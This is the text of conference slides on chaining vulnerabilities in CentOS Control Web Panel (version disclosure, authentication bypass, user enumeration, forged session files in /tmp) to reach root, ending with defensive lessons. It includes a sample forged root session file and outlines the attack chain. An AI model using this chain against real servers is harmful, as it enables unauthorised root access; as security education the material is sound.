Intro to Passkeys and the State of Passwordless.pptx
Bkk.js #9 Do i need to fix that stupid vulnerabilities
1. Do I need…to fix that stupid
vulnerabilities?
By i3umi3iei3ii
2. " This slide is purely intended for educational and research purposes only. We do NOT want anyone to use
any information from this slide to attack or do illegal thing (refer to the laws in your country). So that, any
actions and or activities related to the materials from this repository is solely your responsibility. If you
don’t agree, you are not allowed to access this slide, close this immediately “
2
Disclaimer
Disclaimer
3. Things I would like to share with you today
3
overview
o Server version disclosure
o Bypass Authentication
o Session in /tmp/sess_xxx
o User Enumeration
4. The software we are going to deal with
4
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE
overview
36. It is not a random value
36
Since the ‘rkey’ value is not random, there might be some factor that use to
generate the value, what is it?
o IP Address?
o MAC Address?
Sessionfile/tmo/sess_xxx
40. Information we generate from testing server
40
cwpsrv-bad194011f5ad0cf609c77ad222e50d6 = 3hkhskb2coovn9bpkpuqivst42
/tmp/sess_3hkhskb2coovn9bpkpuqivst42
username|s:4:"root";logged|b:1;rkey|s:16:"w4wlTtbmZvQY8UA8";token|s:36:"cwp_
a5711eb95256129d3304915661c6452e";
Sessionfile/tmo/sess_xxx
41. Login and upload session file to /tmp
41
Sessionfile/tmo/sess_xxx
44. Vulnerabilities Chaining
44
o Server version disclosure o User Enumeration
o Bypass Authentication o Session in /tmp/sess_xxx
Require: Server signature Require: Target URL
Result: Target URL Result: Target Username
Require: Target Username
Result: Authenticated User
Require: Authenticates User
Result: High Privilege User (root)
VulnerabilitiesChaining
45. Conclusion
45
Conclusion
o Server version disclosure : least server information disclose
o Bypass Authentication : Do not trust your client
o Session in /tmp/sess_xxx : Directory and File permission
o User Enumeration : Keep the response message the same
o Hash != Encode != Encrypt
o Do not send sensitive data through the URL